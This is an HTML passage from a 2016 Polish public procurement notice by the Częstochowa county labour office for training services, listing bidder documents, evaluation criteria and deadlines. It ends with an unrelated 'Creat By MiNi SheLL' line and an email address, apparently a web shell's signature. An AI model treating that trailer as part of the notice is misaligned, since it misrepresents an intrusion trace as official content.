<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Program szkolenia, harmonogram, preliminarz.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty stanowiący załącznik nr 2 do SIWZ. Oryginalne pełnomocnictwo (ewentualnie poświadczone notarialnie) potwierdzające uprawnienie osób podpisujących ofertę, jeżeli uprawnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy lub z przepisów prawa. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Prawa zamówień publicznych (oryginał) - zał. Nr 3a do SIWZ. Oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych (oryginał) - zał. Nr 3b do SIWZ. Wykaz doświadczenia (wraz z dokumentami potwierdzającymi, że usługi zostały wykonane należycie), wykaz kadry dydaktycznej oraz wykaz sprzętu - zał. Nr 4a, 4b i 4c do SIWZ. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów (na podstawie art. 26 ust. 2b Prawa zamówień publicznych), niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (oryginał dokumentu) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Wykaz części zamówienia przekazanych do realizacji przez podwykonawców stanowiący załącznik nr 10 do SIWZ. Jeśli Wykonawca nie będzie przekazywał do realizacji przez podwykonawców żadnej części zamówienia należy również złożyć załącznik nr 10, w odpowiednie pola wpisując Nie dotyczy. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w Rozdziale V SIWZ, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. Wykonawca wyłoniony w drodze postępowania na realizację zamówienia składa najpóźniej w dniu podpisania umowy: a) potwierdzenie (pobrane ze strony internetowej www.ris.praca.gov.pl) o aktualnym (na 2016 r.) wpisie swojej instytucji szkoleniowej do Rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy (art. 20 ustawy o promocji zatrudnienia i instytucjach rynku pracy), b) opłaconą polisę, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na wartość minimum 20.000 zł ważną do min. 30.11.2016 r., c) w przypadku udzielenia zamówienia konsorcjum (tzn. wykonawcy określonemu w art. 23 ust. 1 Prawa zamówień publicznych), Zamawiający przed podpisaniem umowy zażąda złożenia umowy regulującej współpracę tych Wykonawców</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy w realizacji szkoleń - 10</li>
<li>3 - Kwalifikacje i doświadczenie kadry dydaktycznej - 10</li>
<li>4 - Certyfikaty jakości usług posiadane przez Wykonawcę - 10</li>
<li>5 - Prowadzenie analiz skuteczności i efektywności przeprowadzanych szkoleń - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.bip.czestochowa.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Częstochowie, ul. K. Szymanowskiego 15, 42-217 Częstochowa, pok. 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2016 godzina 07:30, miejsce: Powiatowy Urząd Pracy w Częstochowie, ul. K. Szymanowskiego 15, 42-217 Częstochowa, pok. 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com